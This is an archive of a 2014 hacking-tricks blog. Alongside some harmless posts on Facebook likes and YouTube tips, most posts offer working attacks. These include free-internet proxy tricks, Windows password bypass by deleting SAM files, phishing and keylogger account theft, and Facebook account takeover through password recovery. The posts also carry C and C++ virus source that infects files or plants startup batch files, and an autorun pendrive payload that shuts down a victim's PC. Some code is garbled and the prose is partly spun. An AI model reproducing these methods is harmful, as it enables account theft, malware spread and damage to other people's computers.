Thursday, December 18, 2014

BEST TRICK TO GET UNLIMITED FB LIKES GET MORE FACEBOOK LIKES .SHARES AND SUBSCRIBES

CLICK ON THE LINK BELOW TO GET MORE FACEBOOK LIKES,SHARES,SUBSCRIBES,GOOGLE CIRCLE,YOUTUBE VIEWS, ETC......

EXCHANGE LIKES>>>>>>>
Like4Like.org

Wednesday, December 17, 2014

vodafone free internet trick on opera mini


This Trick is 100%
working in Opera Mini handler.


Like4Like.org

Create a new setting

 APN - www

 Proxy- 80.239.243.210

 Port- 80


. Now go to handler Opera Mini and use

 . proxy type - HTTP

Proxy server- 180.179.149.11/

 . Enjoy.!!! Unlimited Internet...

Like4Like.org

FREE INTERNET TRICK 2014 GET FREE INTERNET ON YOUR MOBILE OR PC

Here is BSNL Free Internet Trick 2014. This is 100% Working Trick. 



Like4Like.org

Step 1 -  make sure that balance is less than rs.1 (always be secure)




 Step 2 - make the setting given Step 


3 - APN : celloneportal Step

 4 - Proxy: 142.121.33.268 Step

 5 - Port: 8080 Step

 6 - Homepage: google.com Step

 7 - Now restart your phone 
Don't forget to say Thank you. and Share with your friends.


 Enjoy Friends !!!  

Opera Mini Trick for Airtel

Opera Mini Trick for Airtel. Just save following settings.




Apn = Airtelgprs.com


 proxy = 80.239.243.210


 Port = 80

 open Any Opera Handler
Like4Like.org
 proxy Type = Http
 proxy Server = Live.airtelworld.com


Dont be a Silent User comment If Like4Like.orgWorking 

facebook fanpage name changing trick 2014

You can not change your Facebook Page name after 200 likes. After all some Tricks might help you to do so. But now Facebook Engineers understood our Tricks and Ban all the Tricks. Today we are going to tell you about Latest Trick of change Facebook Page name. Difficult method but 100 % Working Trick. You have to follow this Steps.




Step 1 - Download "Switchy" extension for Google chrome


 then save this:- Proxy:- 212.138.92.17

Port:- 8080



Step 2 - Go to the page and click on "Update Page Info" and then click on "translated names".


Step 3 - Right click on "Arabic" and then click on "Inspect Element".

Step 4 - When the script copies the whole Arabic portion, then paste this code over there <tr class="_1hoi dataRow"><th class="label">English:</th><td class="data"><input type="text" class="inputtext" name="en_XX"></ td></tr>

Step 5 - Wait for 10-15 seconds then close the script.

 Step 6 - Now you will see in place of Arabic... it will be written "English'...

Step 7 - Now just write the desired name and then save the changes. (Name should not contain any special characters)

Step 8 - Now click on "Address" and then save this address.... Jordan Amman, Jordan 00000

 Step 9 - Now refresh your browser and click on switchy and change the proxy to "Direct Connection"

  Now you can see your page is renamed

Enjoy friends !!!
If you want to ask any question just drop your Precious comment below we would be happy to help you always.


Wednesday, September 24, 2014

                                       NeeVanna Naal


like us on face book>>>>>https://www.facebook.com/neevannanaal1

Friday, April 11, 2014

delete windows admin without eny apps


Delete Administrator Password Without any software
Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)

Step 1 : Adding a new contact


Sign in to your Gmail account, and open up the Chat pop up menu from the bottom left if it already isn't there. Click on the little arrow, and Add a new contact.
You will asked to enter an email to invite a contact. Note that if you want to chat a friend that is already your contact, then you can skip ahead to the next step.
Step 2 : Adding mobile number

Now, hover on a contact of yours, and click on the Send SMS button as shown below.
Note : If you haven't sent that contact an SMS before, of if you haven't added their number, then instead of the Send SMS button, there will be a Chat button at the exact same position. Click on this button and you will see a small pop-up at the bottom right of your screen, as shown below.

Click on the Continue this chat over SMS button. This will only appear if you haven't added their number, or haven't sent them an SMS before. Otherwise, you will be able to enter your SMS in this pop up. Once you click the continue button, you will be prompted to choose a country and mobile. This is the contact's mobile number. Add a number and then save.
Step 3 : Chat away!

Once you have entered the mobile number, a pop-up will again appear at the bottom right exactly where the previous one did. This is your chat box. You are now ready to go! Type a message in the text field , hit Enter, and sit back and wait for your friend's reply!
SMS credits
This is a smart way Google has found to encourage the use of this service. Initially, you are given fifty credits, which means you can send out 50 messages. For every one message sent, one credit is deducted. But for every message received, say when someone replies to your Gmail text, you get 5 credits. So tell your friends to stop being miserly, and start replying to texts :). You can not, however, exceed the 50 credit limit, no matter how many replies you get.(www.besthacking.in)

What if you lose all the credits?

You will receive one credit after 24 hours. A smart way to increase your credits would be to send a text to your own mobile phone, and then replying to it any number of times to refill your credits!

Thursday, March 13, 2014

hack facebook using pishing


This method is much harder than the rest, but it is also the most prevalent method to chop someone’s account. The most used type of phishing involves developing a fake login web page. The page is usually sent via email to your victim and will appear exactly like the Facebook login web page. If the sufferer logs in, the information will be delivered to you instead involving to Facebook. This process can be difficult because you have got to create a website hosting account and some sort of fake login web page.


click here to download pishing file code
Users are very careful now with logging into Facebook through other links, though, so that only enhances this already difficult process.

How to Protect Yourself

Don’t click on links through e mail. If an email says to you to login to Facebook by way of a link, be careful. Check the WEB SITE. If you’re however doubtful, go directly to the main website and login the method that you always do.
Phishing isn’t only done as a result of email. It can be any link upon any website. Even ads that pop up can be destructive. Don’t click upon any sketchy hunting links that request your information.
Work with an anti-virus similar to Norton or McAfee.
like me on fb







TO know more about facebook hacking click here

hack facebook using pishing


This method is much harder than the rest, but it is also the most prevalent method to chop someone’s account. The most used type of phishing involves developing a fake login web page. The page is usually sent via email to your victim and will appear exactly like the Facebook login web page. If the sufferer logs in, the information will be delivered to you instead involving to Facebook. This process can be difficult because you have got to create a website hosting account and some sort of fake login web page.



Users are very careful now with logging into Facebook through other links, though, so that only enhances this already difficult process.

How to Protect Yourself

Don’t click on links through e mail. If an email says to you to login to Facebook by way of a link, be careful. Check the WEB SITE. If you’re however doubtful, go directly to the main website and login the method that you always do.
Phishing isn’t only done as a result of email. It can be any link upon any website. Even ads that pop up can be destructive. Don’t click upon any sketchy hunting links that request your information.
Work with an anti-virus similar to Norton or McAfee.

hack facebook using key logger


Software Keylogger

Some sort of software keylogger is really a program that may record each stroke around the keyboard that an individual makes, most typically without their understanding. The software should be downloaded manually around the victim’s computer. It will immediately start capturing keystrokes after the computer is started up and remain undetected inside the background. The software might be programmed to send you a summary of all the keystrokes via email.




Hardware Keylogger

These work the same way as it keylogger, except that any USB drive with all the software ought to be connected to the victim’s computer. The USB generate will save a listing of the keystrokes, so it is as simple since plugging it on your own computer and extracting the information. You can look through Keelog for price ranges, but it’s bit above buying the software as you are have the purchase the USB drive with all the program already on it.



How to Protect Yourself

Use a firewall. Keyloggers usually send information through the internet, so any firewall will keep an eye on your computer’s online activity and sniff out anything on your guard.
Install a password manager. Keyloggers can’t steal whatever you don’t type. Password mangers automatically complete important forms without you the need to type anything in.
Update your software package. Once a company knows of any exploits in their software, they work towards an update. Stay behind and you will be susceptible.
Change accounts. If you still don’t feel shielded, you can adjust your password bi-weekly. It may look drastic, but that renders any details a hacker stole useless.

hack facebook account using reset password


Reset the Password
The most effective way to “hack” in someone’s Facebook is through resetting the password. This could become easier done by people who are added in friend list, with anyone they’re trying in order to hack.

The 1st step would be to get your friend’s Facebook email login. If you don’t already know just it, try looking on their Facebook page in the actual Contact Info section.
The 2nd Step would be, click on Forgotten your own password and type from the victim’s email. Their account should show up. Click This is my account.
It will ask if you would like to reset the security password via the victim’s email messages. This doesn’t help, so press No longer have access to these?
It’s going to now ask How can easily we reach you? Type in an email that you’ve got that also isn’t connected to any other Facebook account.
It will now ask you any question. If you’re buddies with the victim, that’s great. If you do not know too much about these, make an educated guess. If you figure that out, you can modify the password. Now you must wait 24 hours to login thus to their account.
Unless you figure out the problem, you can click upon Recover your account along with help from friends. This allows you to choose between three as well as five friends.
It will send them passwords, which you may ask them for, then type into the up coming page. You can either create three to five fake Facebook accounts and add your friend (especially as long as they just add anyone), or you can choose three to five close friends of yours that might be willing to give you the password.

.How to Protect Yourself

Use an email address specifically for your Facebook , nor put that email address on your profile.
When picking a security question and answer, make it difficult. Make it so that no-one can figure it out simply by going through your Facebook. No pet names, absolutely no anniversaries—not even third rank teacher’s names. It’s as easy as looking through a yearbook.
Understand recovering your account through friends. You can find the three friends you want the password sent to. In That way you can protect yourself from the friend and other shared friends ganging up on you to get into your account.

viruse code in oop

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}





How the Virus Program Works?

The algorithm of this virus program is as follows:

Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).

Step-2: Load the copy of the virus itself onto the memory.

Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.

Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.

As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
click here to get more viruse codes

Ways to Keep Your Computer Virus Free:

Email is one of the common ways by which your computer can catch a virus. So, it is always recommended to stay away from SPAM. Open only those emails that has its origin from a trusted source such as those which comes from your contact list.

If you are using your own private email host (other than Gmail, Yahoo, Hotmail etc.) then it is highly recommended that you use a good spam filter. And finally NEVER click on any links in the emails that comes from untrusted sources.

USB thumb/pen drives is another common way by which viruses spread rapidly. So, it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is the safe way to open a pen drive.

Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have an efficient antivirus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).

As we all know, Internet is the main source of all malicious programs including viruses, worms, trojans etc. In fact, Internet contributes to virus infection by up to 80 percent. So, here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum possible extent.

    Do not click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
    You can also use a pop-up blocker to automatically block those pop-ups.

Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So, in order to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from those malicious websites.

Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from viruses. If PC security is your first option then it is recommended that you go for a shareware antivirus software rather than using the freeware stuffs.

Most of the antivirus programs offer the auto-protect feature that provides real-time security for your PC. Make sure that this feature is turned on.

In addition to an antivirus, it is worthwhile to spend a few bucks on a good anti-spyware program. This can provide extra security for your computer.

Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still perform a virus scan before opening them.

Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.

Set up your Windows update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.

While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

And finally it is recommended not to visit those websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. as they contribute much in spreading of virus and other malicious programs

Ways to Hide IP Address Online

Every computer on the Internet has a unique IP address allotted to it which makes it possible to trace it back to its exact location. Even though the concept of Internet Protocol address has been designed for its transparency and traceability, in some cases this questions the privacy of the Internet user where one would not like to reveal his/her identity to the outside world. Well, if you are one such person who is in search of ways to hide your IP address online, then you are at the right place. In this post, I will discuss some of the easy and popular ways to hide your IP address, so that your identity and privacy is kept safe.

One of the most popular and easy ways to hide your IP address online is to use a proxy server. In simple words, a proxy server is any server that will act as an intermediary between your computer and the Internet. Instead of communicating directly with the websites or Internet resources, here you communicate with the proxy server which then forwards all your requests to the remote server so as to establish a back and forth communication between your computer and the Internet. So, whenever you are hiding behind a proxy, the Internet or the websites you visit will only see the IP address of the proxy server, so that your real IP address is kept hidden. For more information on proxy servers, you may refer my earlier post on what is a proxy server and how it works?
Types of Web Proxies

Here is a list of different types of web proxies that you can try:
Website Based Proxy Servers:

This is the simplest of all methods. There are many websites on the Internet that provide free and paid proxy service for the users without having to install any piece of software program on their computer. The following are some of the popular websites that offer proxy service:

    www.hidemyass.com
    www.newipnow.com
    anonymouse.org
    proxify.com
    smarthide.com

The above websites provide a field to enter the URL of the target website that you want to visit anonymously. Once you submit, they will establish a connection with the target site and presents you back with the intended page that you are trying to browse. The downside of using these free services is that, some of them will not offer a secured connection (SSL) and you will often be presented with annoying ads and pop-ups during the course of your browsing. However, you can avoid these by becoming a paid user.
Browser Configured Proxy Servers:

There are hundreds of freely available open proxies that can be found on the Internet. You can obtain the IP address of one of those freely available proxy servers and configure your browser to start using them. However, as they are openly available to public, most of them are either bottlenecked or perform too slow on normal conditions.
Program Based Proxy Servers:

A program based proxy server requires you to install a program on your computer and configure its settings. These provide you with an option to start hiding your IP address with just a click of a button. They automatically connect your computer to a private high speed anonymous proxy server to provide best performance. You also have the option to choose proxies based on location such as countries. The advantage of using this type of proxy is that, it is not limited to a single browser. That means, your computer’s entire web traffic is routed through the proxy, there by guaranteeing you with a highest level of privacy.

Most of these programs come with a free trial where you are required to pay once the trial period expires. The following are some of the popular program based web proxies:

how to protect youre cell phone from hackers

Businesses requirement to manage clients proficiently and viably calls for a steady change in their telephone framework. What’s more, they have to minimise issues, for example, unauthorised utilization of telephone services and toll fraud (Phone Hacking). One of the real tests is to screen the uncalled for utilization of corporate correspondence offices for toll calls. The abuse of authorisation codes is a significant concern for different sorts of businesses. Toll fraud can happen with TDM and IP-based voice frameworks. From representatives that try to make a couple of free calls to programmers, any telephone framework could be helpless. Notwithstanding, call logging programming can dispose of this issue by guaranteeing that a phone framework is not traded off. Call logging includes catching call records, archiving them in a database, and after that recovering them by method of a reporting interface.

Call logging programming can track toll misrepresentation and give cautions and reports of abnormal phone action. The programming enactss as a framework watchdog for VoIP requisitions, cautioning overseers of any suspicious calling movement. This incorporates calls to global ends of the line, visit lines, stimulation services, grown-up services, and that’s just the beginning. In the period of terrorism, it is paramount for calls to be followed.

Reports prepared by call logging programming might be utilized to build business effectiveness with extra mixed programming modules. Phone call information might be gathered and broke down for different purposes incorporating the overseeing of expenses. By taking a gander at these records, a business can figure out toll duplicity as well as screen the expense of calls and make important move to lessen such takes. It is likewise conceivable to figure out the amount of unused or abused developments in a system.

Call logging programming likewise empowers businesses to enhance the execution of workers by examining how rapidly they address inbound calls. The information could be utilized to prepare and order staff to end up additional profitable. With security being a real concern, it is critical to pick the right telephony framework, for example, Cisco Phones and Mitel Phones that offer call logging characteristics to help avoid dangers, for example, toll cheating. Cisco IP Phone s emphasize the bound together interchanges framework that gives clients a protected correspondences system.
Counteractive Action is Superior to Cure:

So what pragmatic measures can telecom or IT administrators take to help anticipate being an alternate casualty of wrongdoing?

A standout amongst the best methodologies to enhancing the security of telephony frameworks incorporates leading customary reviews of:

    Station benefits and confinements
    Voice and information calling examples
    Public and private system steering access
    Automatic way determination
    Software characterized systems
    Private exchanged and pair systems

Different measures incorporate evaluating the design of your PBX in the light of known programmer methods and looking at arrangement portions against best practice and any administrative prerequisites that may relate to your industry area.

Guarantee default voicemail and support passwords are changed and acquaint an arrangement with anticipate effectively guessable passwords being utilized.

Verify that the arrangement requests consistent watchword changes and make moves to guarantee the approach is authorized.

Introducing a call logging result, to furnish notice of suspicious action on your PBX, is a convenient measure and one that can frequently bear the cost of profitable unanticipated cautioning of a strike. Audit existing PBX control works that could be at danger or which could permit slips to happen, as well.

Be conscious that numerous voice frameworks now have an IP address and are in this way associated with your information system – evaluate what procurements you need to section both systems. Security exposures can likewise come about because of the way various PBX stages are joined over a corporate system or from interconnectivity with existing provisions.

Research and examine working framework shortcomings – incorporating explanatory discoveries, make suggestions, prioritisation and alleviation or conclusion needs – and execute a standard calendar of exploring server administration packs, patches, hot-fixes and against infection programming.

Call logging programming is utilized by numerous businesses over the globe to screen and oversee phone calls, cut expenses, and increment bargains and benefit. In this way, little and medium ventures with a fundamentally high calling action should think about putting resources into call logging software.

Good phone systems are very useful when doing business in any company. The managers, employees, owners of the businesses, suppliers and the consumers of the company goods and services use phone systems to communicate to each other making the process of goods and services easy to produce and offer to their clients. Clients will ask questions and give their feedback through the phone. This makes the service delivery more professional and many client will prefer a company with a good phone framework and this will increase the profits in the business.

hack windows pass word


Delete Administrator Password Without any software
Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)

click here to know more ricks 

Friday, March 7, 2014

a harmful virus code


1-Open notepad
2-Copy This code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-Save It As Game.Bat
4-finish
click here to get more virus codes 

how to hack friends pc using pendrive

In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College,school,institute....and Fun With Friends

Step 1:>>copy this  code into notepad:
@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
      Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable

   Save it as "autorun.inf"
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Check How to Disable This:-

First Stop Autorun in Your Computer And Then Format Pendrive..

click here to know more pendrive tricks

Wednesday, March 5, 2014

how to make money online (earn money from face book )


hai;
 Here i can help you. I know people loves online money making without any investment, and i will show you how it is possible.

There are many ways to make cash online, but here you can find only trusted and easy online money makings ways, that is why my list is small. But this information really helps you as a beginner guide of online money making.

When i was a beginner of online money making world i also searched for easy cash making ways and earn money by playing online games. I searched many websites and visited many blogs for online money making ways, but everyone fool me. When i try to search for money making ways on web many websites offer me big cash making ways daily, and they force me to complete their surveys, trial offers and sign up offers, after completing their surveys they ask me my email id for sending money making information and they really send me some information, but the problem is, that all need an opening investment or registration fee to continue. Then i realize they always trying to fool me and i have no use with their cash making information.




From my continues search for online money making i also get some good, trusted, easy and zero investment cash making ways. And I concluded, in the web fraud online money making websites are more than real websites. Trusted money making websites only countable. That is the reason why i created this website, i want my friends never fall into a scam world


ok. i m jest introducing you how to make money from face book do you intrested to know more?
jest"click on the below image"
its a advetising program you can earn more money
 click here to know more

Monday, March 3, 2014

Monitoring Your Home or Office Computer with Computer Monitoring Software

If you think you could benefit from knowing what happens on your home or office computer while you’re away from it then computer monitoring software could be for you. What reasons could you have for wanting to knowwhat happens? You may have children who you think are playing to many PC games when they should be doing home work. You may have a husband who you suspect of online gambling when you’re out the house. Or you may have employees who you think are looking at Facebook and Twitter all day, rather than doing work! Whatever the reason, there is a solution. There are a wide range of computer monitoring applications, available in abundance online, all of which designed to suit a specific need. The software comes in many forms: computer monitoring software, classroom monitoring software, employee monitoring software. All of these essentially do the same job, but have some minor alterations to make it more suitable for the environment it’s installed in. That being said, most monitoring applications will have the same basic set of features. For example, most will work in stealth, so that once the program is installed it will not be seen by users of the PC, and will not be findable in places like the start menu or program files directory. The only way to open monitoring software is to enter a secret combination of keys (usually something like control+alt+F6) and then your password. You’ll then be able to control the software and take a look at the results. Computer Monitoring Software The results will vary depending on the developer and the type of software you have. Normal computer monitoring software is what you’d install on a single to computer and is what we’ll focus on in this article. With your average monitoring software you’ll be able to monitor the following: Any website visited, along with anything typed into that site. Any program used, along with anything typed into that program. Any file activity, including deleted, moved or created files. Anything printed. Anything copied and pasted to and from the clipboard. All of this will usually be shown in the results along with the date and time of the said activity. ‘Anything typed’ will also include passwords, emails and instant messages along with any documents typed into applications like Microsoft Word. Another feature that most users find helpful is the email reports feature. This allows you to have the results emailed to your inbox every X minutes or hours, to save you having to log back into the target computer every time you want to sift through the logs. Some monitoring programs also have the ability to log into your account via their website, and to look through logs there; programs that have this feature tend to be more expensive though, or have a monthly subscription. As mentioned before, this is a standardized set of features that you’ll find in most monitoring applications. Although, some will slightly different features, and some will have more. Advanced monitoring software can include extra features like web cam and microphone monitoring, self uninstall on a certain date, and the ability to watch the computer in real-time, but again, the price of the software will reflect this. . . Variations in monitoring software will reflect what the software is for. As mentioned above, employee and classroom monitoring software are different types that will have the same features as the ones mentioned above, plus some that makes the lives of employers and teachers slightly easier. For example, some employee and classroom monitoring software (these types are separate but are mentioned together for their similarities) have the ability to monitor all employees screens at once from the single ‘boss or teacher’ computer, to control those screens remotely, to block or activate certain websites or applications, and to see productivity reports for each targeted computer. Once again, the price for employee or classroom monitoring can be a lot more expensive than single computer monitoring software, and can sometimes be priced according to the number of computers you want to monitor. Monitoring applications of all types can be found pretty easily online, and most will have a free trial so that you can test before you buy. Gecko Monitor is a well known, standard computer monitoring solution, and is available with a free trial from their website at http://www.geckomonitor.com

increes you tube trafic 50 tips

A) Keyword Research using Youtube’s Keyword Tool

1. Create the videos viral, and spread them to as many blogs as you possibly can. Easy way, when you finish to publish a movie on Youtube, create an article and embed the video with your Web page.

2. Like a usual blog post, it’s important that your Youtube video also becomes social signals. Share and submit your own videos to popular web 2 . 0 and bookmarking sites such as Twitter, Google plus, Zynga, Digg. You can also reveal your videos on Fan pages and enquire users to comment in addition to like your video.

3. Making a video is not plenty of, you need to look after professional touch. You are able to use video editing tools or perhaps better hire a Video editor to add final effects on your own videos..

4.  Make sure the sound with your videos is clear in addition to mixed and edited effectively so users can plainly hear it.

5.  Keep content funny, informative & engaging so viewers will watch it from beginning to end.

6.  Try and keep the video tutorials you create clean without an excessive amount controversial material.

7. Embed your logo and website into the video somehow. That you can do this with text by the end or beginning, or by including your logo or URL throughout the entire video.

8.  Have goals to your YouTube video tutorials, but remember there are thousands of videos on the site, and some have an incredible number of hits while others only use a couple hundred. Set realistic goals.

9.  Be sure to have good digicam and editing products. If you don’t wish to sink the money into these things, consider hiring an expert.

10. Keep the resolution on the video as high as possible, so it’s as clear as it can be.

.

b) Tag Updates/Spy on the competition

11. Think about general color schemes. Some videos may record in a yellow or crimson hue. This make a difference to viewer’s opinions subliminally, so make an effort to keep the shades realistic

12. Keep positive attitude, Do not lose focus from the purpose & your task on the video. Be yourself and take it easy when speaking.

13. Remember that few things are perfect in videos unless you then have a professional editor, so just have fun and keep the goal in mind.

14. Practice before posting the last video. Do several dry runs just before taping and creating.

15. Create a group of ongoing videos and stories, so users are going to be hooked up and want for more information.

16. Do more than just talk. People don’t want to sit & watch somebody just talking to the camera. Make it fascinating and interesting in addition to fun.

17. Try to restriction on the video to a few minutes if possible. After about two and a half minutes, users have a tendency to lose curiosity and move onto something more important.

18. Stick to a schedule when you record a collection, otherwise people will just give up the videos. Be sure you release the next ones by the due date.

19. Have a sign off men and women will remember, then adhere to it. This creates an expression of branding.

20. Request feedback from ones viewer. Some people won’t comment unless you ask them to.

.

c) Title Tag optimization

21. Assemble a forged of characters. Use individuals in movies beside yourself. Recruit friends and co workers to be actors inside the videos.

22. Don’t use music in background of your video, you do not have legal authorization under the law.

23. Obviously the title of the video is simple & important as necessary.

24. Grab viewers simply by integrating important keywords in to the title. This also helps boost the search engine.

25. Use tags beyond just the keywords, as which gets peoples’ focus.

26. If people placed negative comments, overlook them. By “feeding the trolls” you happen to be encouraging their bad behavior and in ways something you regret down the line. Enable comment small amounts for uploaded video clips, and accept true and meaningful comment to help keep the comment quality on your Youtube channels.

27. Use as many places as you can to embed ones video, like Fb, MySpace, Digg, Tweets, your home page, and many other areas.

28. Let your mail subscribers and customers know when a new video is posted.

29. Add your online video to several communities and subject areas of YouTube regarding more exposure.

30. Make sure you thank people exactly who post positive comments or consider themselves followers of your respective videos.

.

d) Description optimization

31. Be aware that not all videos you create will be a hit. It is a hit and miss venture, so be patient and practice making good videos.

32. Write the script in advance. While impromptu videos are fun, it’s really easy to mess up the vision when you improvise.

33. Use tools similar to YouTube Insight to track your visitors and hits.

34. Must use this word video in your title, because people mostly use this word, and will surely step into search engines.

35. Don’t use your video as an advertisement. In other words, get a point across but do it without trying to sell something.

36. Pick the thumbnail wisely. Youtube really lets users choose their thumbnails so practice it carefully and thoughtfully.

37. You can erase comments, so do not hesitate to get rid of negative or impolite comments under ones video.

38. You can release multiple video at when, so if you have several each time, feel free to accomplish this.

39. Be real , nor try to phony out your audiences. Most people can spot a phony video or a thing that isn’t sincere.

40. Enjoy the fun and focus, so you’re developing something people would want to share and forwards to others.

.

e) Youtube Analytics

41. Beside from your logo as well as website, include an easy method for people to contact you or our business via electronic mail.

42. Watch others as well as learn. By viewing other videos which are related to your small business, you can get yourself a feel for what folks are doing, and what others are saying about it.

43. Follow your target Visitors. Don’t try to branch out too far from your objective, or you could easily lose dependable followers.

44. Publish webcam live video lessons. Have a webcam located at the office, or additional location, and then upload this onto your YouTube channel. It’s a fun strategy to get others involved in the day to time operations of what you do.

45. Make a route and profile. This gives viewers a property base to consider your videos and check on any new ones.

46. Do not utilize cuss words as well as inappropriate language and also behavior.

47. Use props, halloween costumes, and other “organic” things inside your video. Fancy editing will not always make for top viewing.

48. Try to open each video with a small montage, song, or your logo, so that people easily recognize your business or who you are.

49. Utilize Yahoo Video and also other sites to get your video exposed to help other audiences.

50. Stipulate your channel type, and have a definite sense of precisely what you’re offering about the channel’s main page.

.

Youtube is probably the high traffic website and if you are using it wisely you can easily drive huge traffic coming from youtube. I hope you liked this post and if you discover it worth sharing, don’t forget to share this post on stumbleupon and twitter.

Sunday, March 2, 2014

How to Convert Smartphone into Remote Control






Convert your smartphone into Remote Control

As we all know that now a days using remote control we control many electronic devices, Such as Television, music System, Car, etc. for all of these we used different different devices or we can say that for all of these devices we used different remote control, but, if we find only one  common remote control and using this remote control we control all the devices !, such this type of remote control we can say “Universal Remote Control”. You can make your smartphone a universal remote control. For this you just need to instilled some applications in to your smartphone.

 .

Start your Car from anywhere with your Smartphone

Viper SmartStart (Free app) using this application you can lock and unlock you car and you can also start your car, even also you can find your car location. You can install and download this apps from Google play store, iTunes Store as well on your windows phone.

 .

To control home appliances

for controlling home appliances, Home automation maker company “Crestron” provides remote control application for home appliances called “Crestron apps” . Using this application you can use your smartphone as a remote control. This apps connected with wi-fi and control home appliances. This apps are available in two version for android user, first one is free and second one is paid (you need to pay approx 5000 Rs. To installed). iPhone user can installed this apps from iTunes store.

 .



.

To Control your Personal Computer

You can installed Gmote Application in to your smartphone to control your personal computer through your smartphone for this you need to installed Gmote Clint Application in your smartphone  then after you need to installed Gmote server then after you can control your personal computer through you smartphone.

 .

Touch mouse Application

Touch mouse designed by Logitech, using this application you can use your iPhone and iPad touch to your PC’s keyboard and trackpad, Using WiFi Touch Mouse can be used.

 .

Logitech Harmony Smart Control

Using logitech’s this application you can make your android and iPhone smartphone as a universal remote control, using this application your smartphone work at least 8 different remote control such as Tv, Music System, gaming etc included.

If your smartphone is not with you at this time you can use one general remote control that come with this application, this application price is $ 129

how to crack wifi using cmd



http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=41316&cid=9758&cuid=3pzbb2j&ad=11448&subid=&opt1=&opt2= 1 Go to Start. In the search box, type in "cmd". If your Start menu has the Run command, click Run and type "cmd" in the field.

2 Type"ipconfig" using the cursor.

